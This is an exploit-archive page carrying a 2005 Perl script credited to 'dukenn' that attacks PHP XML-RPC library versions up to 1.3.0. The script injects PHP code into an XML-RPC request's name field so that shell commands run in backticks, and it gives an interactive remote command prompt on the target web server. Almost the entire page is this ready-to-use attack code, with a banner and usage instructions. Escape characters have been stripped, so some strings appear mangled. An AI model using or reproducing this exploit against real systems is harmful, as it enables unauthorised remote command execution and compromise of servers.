[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : xmlrpc.php Library <= 1.3.0 Remote Command Execute Exploit (2)
# Published : 2005-07-04
# Author : dukenn
# Previous Title : XOOPS <= 2.0.11 xmlrpc.php SQL Injection Exploit
# Next Title : xmlrpc.php Library <= 1.3.0 Remote Command Execute Exploit (3)
#-------------------------------------------------------#
# /| #
# | | #
# | | #
# / ________| |___ #
# / _______ __/ #
# / |_____ | | _ _ _ _ ()___ #
# / / ___ | |<_> / | | | || || | | | #
# / /__ | || | _ /__ |_ | | ||_/ || | |_| #
# / ______ | || || | / | | | || || | | #
# / / | || || | / |_ |_ |_|| || | _| #
# _/ |_/ | || || | ___ _ _ #
# | | | || /| | | | | ||/| #
# | ||/ | | |_ |_|| | #
# | | | || | #
# | |_ | || | #
# #
# Original advisory by http://gulftech.org/ #
# Exploit coded by dukenn (http://asteam.org) #
# #
#-------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)n";
if ($ARGV[0] && $ARGV[1])
{
$host = $ARGV[0];
$xml = $ARGV[1];
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "connecterrorn";
while (1) {
print '['.$host.']# ';
$cmd = <STDIN>;
chop($cmd);
last if ($cmd eq 'exit');
$xmldata = "<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_n';echo `".$cmd."`;echo '_end_';exit;/*</name></value></param></params></methodCall>";
print $sock "POST ".$xml." HTTP/1.1n";
print $sock "Host: ".$host."n";
print $sock "Content-Type: text/xmln";
print $sock "Content-Length:".length($xmldata)."nn".$xmldata;
$good=0;
while ($ans = <$sock>)
{
if ($good == 1) { print "$ans"; }
last if ($ans =~ /^_end_/);
if ($ans =~ /^_begin_/) { $good = 1; }
}
if ($good==0) {print "Exploit Failedn";exit();}
}
}
else {
print "Usage: perl xml.pl [host] [path_to_xmlrpc]nn";
print "Example: perl xml.pl target.com /script/xmlrpc.phpn";
exit;
}
# www.Syue.com [2005-07-04]